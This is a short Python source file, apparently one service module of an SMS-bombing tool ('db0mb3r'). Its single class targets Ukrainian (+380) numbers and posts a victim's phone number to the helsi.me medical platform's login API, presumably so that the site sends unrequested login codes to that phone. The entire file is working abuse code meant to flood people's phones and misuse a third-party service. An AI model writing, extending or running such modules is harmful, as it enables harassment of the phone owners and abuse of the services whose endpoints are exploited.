helsi.py 285 B

123456789101112
  1. from db0mb3r.services.service import Service
  2. class Helsi(Service):
  3. phone_codes = [380]
  4. async def run(self):
  5. await self.post(
  6. "https://helsi.me/api/healthy/accounts/login",
  7. json={"phone": self.formatted_phone, "platform": "PISWeb"},
  8. )